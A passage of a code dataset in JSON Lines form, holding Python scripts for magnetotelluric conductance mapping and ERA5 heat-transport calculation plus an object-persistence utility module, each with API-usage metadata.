"usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 8, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 12, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 16, "usage_type": "call"}, {"api_name": "graph_neural_network.GNN", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 103, "usage_type": "call"}]}
+{"seq_id": "259428083", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 3 18:11:42 2021\n\n:copyright: \n Jared Peacock (jpeacock@usgs.gov)\n\n:license: MIT\n\n\"\"\"\nfrom pathlib import Path\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom mtpy.modeling import modem\nfrom mtpy.utils import array2raster\n\n\ndfn = r\"c:\\Users\\jpeacock\\OneDrive - DOI\\ClearLake\\modem_inv\\inv_04_topo\\cl_z03_t02_c03_071.dat\"\nd = modem.Data()\nd.read_data_file(dfn)\n\n# mfn = r\"c:\\Users\\jpeacock\\OneDrive - DOI\\Geothermal\\GreatBasin\\modem_inv\\canv_01\\canv_t03_c04_084.rho\"\nmfn = r\"c:\\Users\\jpeacock\\OneDrive - DOI\\ClearLake\\modem_inv\\inv_04_topo\\cl_z03_t02_c03_071.rho\"\n# mfn = r\"c:\\Users\\jpeacock\\OneDrive - DOI\\Geothermal\\Umatilla\\modem_inv\\inv_06\\um_z05_c03_083.rho\"\n# model_center = (-118.704435 + .03, 45.597757000000001 + .02)\n\nmodel_center = (-122.751369, 38.987645)\nlower_left = (-123.19, 38.63)\n\nz_dict = {\n \"surface\": np.array((0, 5000)),\n \"middle_crust\": np.array((5000, 15000)),\n \"lower_crust\": np.array((15000, 50000)),\n \"upper_mantle\": np.array((45000, 90000)),\n \"mantle\": np.array((90000, 200000)),\n}\npad = 7\n\n\nm = modem.Model()\nm.read_model_file(mfn)\ngx, gy = np.meshgrid(m.grid_east, m.grid_north)\n\nfig = plt.figure(1)\nfig.clf()\n\nfor ii, key in enumerate(z_dict.keys()):\n z = z_dict[key]\n index_min = np.where(m.grid_z <= z.min())[0][-1]\n index_max = np.where(m.grid_z >= z.max())[0][0]\n\n conductance = (1.0 / m.res_model[:, :, index_min:index_max]) * abs(\n m.grid_z[index_min:index_max]\n )\n conductance = np.log10(conductance.sum(axis=2))\n\n ax = fig.add_subplot(1, len(z_dict.keys()), 1 + ii, aspect=\"equal\")\n im = ax.pcolormesh(\n gx,\n gy,\n conductance,\n cmap=\"gnuplot2\",\n )\n # vmin=conductance[pad:-pad, pad:-pad].min(),\n # vmax=conductance[pad:-pad, pad:-pad].max())\n\n ax.scatter(\n d.station_locations.rel_east,\n d.station_locations.rel_north,\n marker=\"v\",\n s=20,\n )\n ax.set_xlim((m.grid_east[pad], m.grid_east[-pad]))\n ax.set_ylim((m.grid_north[pad], m.grid_north[-pad]))\n\n cb = plt.colorbar(im, ax=ax, shrink=0.35)\n\n array2raster.array2raster(\n Path(m.save_path)\n .joinpath(f\"canv_conductance_impedance_{key}.tiff\")\n .as_posix(),\n (lower_left[0], lower_left[1]),\n 500.0,\n 500.0,\n conductance[pad:-pad, pad:-pad],\n )\n\nplt.show()\n", "sub_path": "plot_conductance_cl.py", "file_name": "plot_conductance_cl.py", "file_ext": "py", "file_size_in_byte": 2387, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "mtpy.modeling.modem.Data", "line_number": 19, "usage_type": "call"}, {"api_name": "mtpy.modeling.modem", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "mtpy.modeling.modem.Model", "line_number": 40, "usage_type": "call"}, {"api_name": "mtpy.modeling.modem", "line_number": 40, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "mtpy.utils.array2raster.array2raster", "line_number": 78, "usage_type": "call"}, {"api_name": "mtpy.utils.array2raster", "line_number": 78, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}]}
+{"seq_id": "499814257", "text": "import xarray as xr\nimport numpy as np\n\nimport sys \nsys.path.insert(0, '../')\nimport ERA5_functions as era_fncts\n\nweight = np.load('aht_weights.npy')\n\nyear = 2021\n\ntimes = '12'\n\nrange1 = np.asarray(range(0, 360, 10))\nrange2 = np.asarray(range(10, 370, 10))\n\nrange1 = np.append(range1, 360)\n\nif year in range(1980, 2030, 4):\n range2 = np.append(range2, 366)\nelse:\n range2 = np.append(range2, 365)\n\nvcomp, temp, sphum, geo_pot = era_fncts.aht_opener_helper(year, times)\n\nfor i in range(len(range1)):\n for t in range(range1[i], range2[i]):\n new_ds = era_fncts.aht_instant(era_fncts.aht_time_sel_helper(vcomp, temp, sphum, geo_pot, t), weight)\n if t == range1[i]:\n full_ds = new_ds\n else:\n full_ds = xr.concat([full_ds, new_ds], 'time')\n\n #full_ds\n full_ds.to_netcdf('../aht_calcs/' + str(year) + '/' + str(year) + '_' + times + 'z_' + str(range1[i]) + '_' + str(range2[i]-1))\n", "sub_path": "Calculate_AHT/do_aht_12z.py", "file_name": "do_aht_12z.py", "file_ext": "py", "file_size_in_byte": 932, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.insert", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 22, "usage_type": "call"}, {"api_name": "ERA5_functions.aht_opener_helper", "line_number": 24, "usage_type": "call"}, {"api_name": "ERA5_functions.aht_instant", "line_number": 28, "usage_type": "call"}, {"api_name": "ERA5_functions.aht_time_sel_helper", "line_number": 28, "usage_type": "call"}, {"api_name": "xarray.concat", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "112548916", "text": "# This file is placed in the Public Domain.\n\nimport datetime\nimport json as js\nimport os\nimport pathlib\nimport queue\nimport re\nimport threading\nimport sys\nimport types\nimport time\nimport uuid\n\n\nclass ENoFile(Exception):\n\n pass\n\n\nclass ENoModule(Exception):\n\n pass\n\n\nclass ENoType(Exception):\n\n pass\n\n\nclass ENoJSON(Exception):\n pass\n\n\n\nclass Object:\n\n __slots__ = (\"__dict__\", \"__stp__\", \"__otype__\", \"__parsed__\")\n\n def __init__(self, *args, **kwargs):\n super().__init__()\n self.__otype__ = gettype(self)\n self.__parsed__ = None\n self.__stp__ = os.path.join(\n gettype(self),\n str(uuid.uuid4()),\n os.sep.join(str(datetime.datetime.now()).split()),\n )\n if args:\n self.__dict__.update(args[0])\n\n @staticmethod\n def __default__(oo):\n if isinstance(oo, Object):\n return vars(oo)\n if isinstance(oo, dict):\n return oo.items()\n if isinstance(oo, list):\n return iter(oo)\n if isinstance(oo, (type(str), type(True), type(False), type(int), type(float))):\n return oo\n return oqn(oo)\n\n def __oqn__(self):\n return \"<%s.%s object at %s>\" % (\n self.__class__.__module__,\n self.__class__.__name__,\n hex(id(self)),\n )\n\n def __contains__(self, k):\n if k in keys(self):\n return True\n return False\n\n def __delitem__(self, k):\n if k in self:\n del self.__dict__[k]\n\n def __getitem__(self, k):\n return self.__dict__[k]\n\n def __iter__(self):\n return iter(self.__dict__)\n\n def __len__(self):\n return len(self.__dict__)\n\n def __lt__(self, o):\n return len(self) < len(o)\n\n def __setitem__(self, k, v):\n self.__dict__[k] = v\n\n def __repr__(self):\n return json(self)\n\n def __str__(self):\n return str(self.__dict__)\n\n\nclass Default(Object):\n\n def __getattr__(self, k):\n try:\n return super().__getitem__(k)\n except KeyError:\n self[k] = \"\"\n return self[k]\n\n\nclass List(Object):\n\n def append(self, key, value):\n if key not in self:\n self[key] = []\n if value in self[key]:\n return\n if isinstance(value, list):\n self[key].extend(value)\n else:\n self[key].append(value)\n\n def update(self, d):\n for k, v in d.items():\n self.append(k, v)\n\n\nclass Db(Object):\n\n def all(self, otype, selector=None, index=None, timed=None):\n nr = -1\n if selector is None:\n selector = {}\n for fn in fns(otype, timed):\n o = hook(fn)\n if selector and not search(o, selector):\n continue\n if \"_deleted\" in o and o._deleted:\n continue\n nr += 1\n if index is not None and nr != index:\n continue\n yield fn, o\n\n def deleted(self, otype):\n for fn in fns(otype):\n o = hook(fn)\n if \"_deleted\" not in o or not o._deleted:\n continue\n yield fn, o\n\n def every(self, selector=None, index=None, timed=None):\n if selector is None:\n selector = {}\n nr = -1\n wd = getmain(\"wd\")\n for otype in os.listdir(os.path.join(wd, \"store\")):\n for fn in fns(otype, timed):\n o = hook(fn)\n if selector and not search(o, selector):\n continue\n if \"_deleted\" in o and o._deleted:\n continue\n nr += 1\n if index is not None and nr != index:\n continue\n yield fn, o\n\n def find(self, otype, selector=None, index=None, timed=None):\n if selector is None:\n selector = {}\n got = False\n nr = -1\n for fn in fns(otype, timed):\n o = hook(fn)\n if selector and not search(o, selector):\n continue\n if \"_deleted\" in o and o._deleted:\n continue\n nr += 1\n if index is not None and nr != index:\n continue\n got = True\n yield (fn, o)\n if got:\n return (None, None)\n return None\n\n def lastmatch(self, otype, selector=None, index=None, timed=None):\n res = sorted(\n find(otype, selector, index, timed), key=lambda x: fntime(x[0])\n )\n if res:\n return res[-1]\n return (None, None)\n\n def lastobject(self, o):\n return self.lasttype(o.__otype__)\n\n def lasttype(self, otype):\n fnn = fns(otype)\n if fnn:\n return hook(fnn[-1])\n return None\n\n def lastfn(self, otype):\n fn = fns(otype)\n if fn:\n fnn = fn[-1]\n return (fnn, hook(fnn))\n return (None, None)\n\n\ndef delkeys(self, keyz=None):\n if keyz is None:\n keyz = []\n for k in keyz:\n del self[k]\n\n\ndef dump(self):\n prv = os.sep.join(self.__stp__.split(os.sep)[:2])\n self.__stp__ = os.path.join(prv, os.sep.join(str(datetime.datetime.now()).split()))\n wd = getmain(\"wd\")\n opath = os.path.join(wd, \"store\", self.__stp__)\n cdir(opath)\n return js.dumps(self.__dict__, default=self.__default__, sort_keys=True)\n\n\ndef edit(self, setter, skip=True, skiplist=None):\n if skiplist is None:\n skiplist = []\n count = 0\n for key, v in items(setter):\n if skip and v == \"\":\n del self[key]\n if key in skiplist:\n continue\n count += 1\n if v in [\"True\", \"true\"]:\n self[key] = True\n elif v in [\"False\", \"false\"]:\n self[key] = False\n else:\n self[key] = v\n return count\n\n\ndef fmt(self, keyz=None, empty=True, skip=None, only=None):\n if keyz is None:\n keyz = keys(self)\n if not keyz:\n keyz = [\"txt\"]\n if skip is None:\n skip = []\n res = []\n txt = \"\"\n for key in sorted(keyz):\n if only and key not in only:\n continue\n if key in skip:\n continue\n if key in self:\n val = self[key]\n if empty and not val:\n continue\n val = str(val).strip()\n res.append((key, val))\n result = []\n for k, v in res:\n result.append(\"%s=%s%s\" % (k, v, \" \"))\n txt += \" \".join([x.strip() for x in result])\n return txt.strip()\n\n\ndef get(self, key, default=None):\n return self.__dict__.get(key, default)\n\ndef getcls(cn):\n mn, cn = cn.rsplit(1, \".\")\n m = sys.modules.get(mn, None)\n if m: \n return getattr(mod, cn, None)\n return None\n\ndef getrepr(txt):\n if not txt:\n return \"nill\"\n r = \"\"\n txt = txt[1:-1]\n s = txt.split()\n if s == \"function\":\n s = s[1]\n c = s[0].split(\".\")[-1]\n id = s[-1]\n return \"%s:%s\" % (c, id)\n\ndef getmain(name):\n return getattr(sys.modules[\"__main__\"], name, None)\n\n\ndef getwd():\n return getmain(\"wd\")\n\n\ndef getname(o):\n t = type(o)\n if t == types.ModuleType:\n return o.__name__\n if \"__self__\" in dir(o):\n return \"%s.%s\" % (o.__self__.__class__.__name__, o.__name__)\n if \"__class__\" in dir(o) and \"__name__\" in dir(o):\n return \"%s.%s\" % (o.__class__.__name__, o.__name__)\n if \"__class__\" in dir(o):\n return o.__class__.__name__\n if \"__name__\" in dir(o):\n return o.__name__\n return None\n\n\ndef keys(self):\n return self.__dict__.keys()\n\n\ndef items(self):\n try:\n return self.__dict__.items()\n except AttributeError:\n return self.items()\n\ndef last(self):\n db = Db()\n t = str(gettype(self))\n path, l = db.lastfn(t)\n if l:\n update(self, l)\n if path:\n splitted = path.split(os.sep)\n stp = os.sep.join(splitted[-4:])\n return stp\n return None\n\ndef merge(self, d):\n for k in keys(d):\n if not get(self, None):\n self[k] = d[k]\n\ndef json(self):\n s = js.dumps(self.__dict__, default=self.__default__, sort_keys=True)\n s = s.replace(\"'\", \"\\\\\\\"\")\n s = s.replace('\"', \"'\")\n return s\n\n\ndef load(self, opath):\n if opath.count(os.sep) != 3:\n raise ENoFile(opath)\n splitted = opath.split(os.sep)\n stp = os.sep.join(splitted[-4:])\n lpath = os.path.join(getwd(), \"store\", stp)\n if os.path.exists(lpath):\n with open(lpath, \"r\") as ofile:\n d = js.load(ofile, object_hook=Object)\n update(self, d)\n self.__stp__ = stp\n\n\ndef merge(self, d):\n for k, v in items(d):\n if not v:\n continue\n if k in self:\n if isinstance(self[k], dict):\n continue\n self[k] = self[k] + v\n else:\n self[k] = v\n\ndef oqn(self):\n return Object.__oqn__(self)\n\n\ndef overlay(self, d, keyz=None, skip=None):\n for k, v in items(d):\n if keyz and k not in keyz:\n continue\n if skip and k in skip:\n continue\n if v:\n self[k] = v\n\n\ndef register(self, k, v):\n self[str(k)] = v\n\n\ndef save(self, tab=False):\n prv = os.sep.join(self.__stp__.split(os.sep)[:2])\n self.__stp__ = os.path.join(prv, os.sep.join(str(datetime.datetime.now()).split()))\n opath = os.path.join(getwd(), \"store\", self.__stp__)\n cdir(opath)\n with open(opath, \"w\") as ofile:\n js.dump(self.__dict__, ofile, default=self.__default__, indent=4, sort_keys=True)\n os.chmod(opath, 0o444)\n return self.__stp__\n\n\ndef search(self, s):\n ok = False\n for k, v in items(s):\n vv = getattr(self, k, None)\n if v not in str(vv):\n ok = False\n break\n ok = True\n return ok\n\n\ndef set(self, key, value):\n self.__dict__[key] = value\n\n\ndef update(self, data):\n try:\n return self.__dict__.update(vars(data))\n except TypeError:\n return self.__dict__.update(data)\n\n\ndef values(self):\n return self.__dict__.values()\n\n\ndef cdir(path):\n if os.path.exists(path):\n return\n if path.split(os.sep)[-1].count(\":\") == 2:\n path = os.path.dirname(path)\n pathlib.Path(path).mkdir(parents=True, exist_ok=True)\n\n\ndef check(o, keyz=None):\n if keyz is None:\n keyz = []\n for k in keyz:\n if k in o:\n return True\n return False\n\ndef find(name, selector=None, index=None, timed=None):\n db = Db()\n t = getmain(\"tbl\")\n if not t:\n return\n for n in get(t.names, name, [name,],):\n for fn, o in db.find(n, selector, index, timed):\n yield fn, o\n\n\ndef fntime(daystr):\n daystr = daystr.replace(\"_\", \":\")\n datestr = \" \".join(daystr.split(os.sep)[-2:])\n if \".\" in datestr:\n datestr, rest = datestr.rsplit(\".\", 1)\n else:\n rest = \"\"\n t = time.mktime(time.strptime(datestr, \"%Y-%m-%d %H:%M:%S\"))\n if rest:\n t += float(\".\" + rest)\n else:\n t = 0\n return t\n\n\ndef fns(name, timed=None):\n if not name:\n return []\n p = os.path.join(getwd(), \"store\", name) + os.sep\n res = []\n d = \"\"\n for rootdir, dirs, _files in os.walk(p, topdown=False):\n if dirs:\n d = sorted(dirs)[-1]\n if d.count(\"-\") == 2:\n dd = os.path.join(rootdir, d)\n fls = sorted(os.listdir(dd))\n if fls:\n p = os.path.join(dd, fls[-1])\n if (\n timed\n and \"from\" in timed\n and timed[\"from\"]\n and fntime(p) < timed[\"from\"]\n ):\n continue\n if timed and timed.to and fntime(p) > timed.to:\n continue\n res.append(p)\n return sorted(res, key=fntime)\n\n\ndef gettype(o):\n return str(type(o)).split()[-1][1:-2]\n\n\ndef hook(hfn):\n if hfn.count(os.sep) > 3:\n oname = hfn.split(os.sep)[-4:]\n else:\n oname = hfn.split(os.sep)\n cname = oname[0]\n fn = os.sep.join(oname)\n mn, cn = cname.rsplit(\".\", 1)\n mod = sys.modules.get(mn, None)\n if not mod:\n raise ENoModule(mn)\n t = getattr(mod, cn, None)\n if t:\n o = t()\n load(o, fn)\n return o\n raise ENoType(cname)\n\n\ndef listfiles(workdir):\n path = os.path.join(workdir, \"store\")\n if not os.path.exists(path):\n return []\n return sorted(os.listdir(path))\n\n\ndef setwd(path):\n global wd\n wd = path\n\ndef spl(txt):\n return [x for x in txt.split(\",\") if x]\n", "sub_path": "ob/obj.py", "file_name": "obj.py", "file_ext": "py", "file_size_in_byte": 12600, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 46, "usage_type": "call"}, {"api_name": "os.sep.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 47, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 223, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 223, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 224, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 224, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path", "line_number": 226, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 228, "usage_type": "call"}, {"api_name": "sys.modules.get", "line_number": 282, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 282, "usage_type": "attribute"}, {"api_name": "sys.modules", "line_number": 300, "usage_type": "attribute"}, {"api_name": "types.ModuleType", "line_number": 309, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 339, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 340, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 340, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 350, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 357, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 359, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 360, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 360, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 361, "usage_type": "call"}, {"api_name": "os.path", "line_number": 361, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path", "line_number": 362, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 364, "usage_type": "call"}, {"api_name": "os.sep.join", "line_number": 399, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 399, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 400, "usage_type": "call"}, {"api_name": "os.path", "line_number": 400, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 400, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 400, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 400, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 400, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 401, "usage_type": "call"}, {"api_name": "os.path", "line_number": 401, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 404, "usage_type": "call"}, {"api_name": "os.chmod", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 436, "usage_type": "call"}, {"api_name": "os.path", "line_number": 436, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 438, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 439, "usage_type": "call"}, {"api_name": "os.path", "line_number": 439, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 440, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 463, "usage_type": "attribute"}, {"api_name": "time.mktime", "line_number": 468, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 479, "usage_type": "call"}, {"api_name": "os.path", "line_number": 479, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 479, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 482, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 486, "usage_type": "call"}, {"api_name": "os.path", "line_number": 486, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 487, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 489, "usage_type": "call"}, {"api_name": "os.path", "line_number": 489, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 508, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 509, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 511, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 513, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 513, "usage_type": "attribute"}, {"api_name": "sys.modules.get", "line_number": 515, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 515, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 527, "usage_type": "call"}, {"api_name": "os.path", "line_number": 527, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 528, "usage_type": "call"}, {"api_name": "os.path", "line_number": 528, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 530, "usage_type": "call"}]}
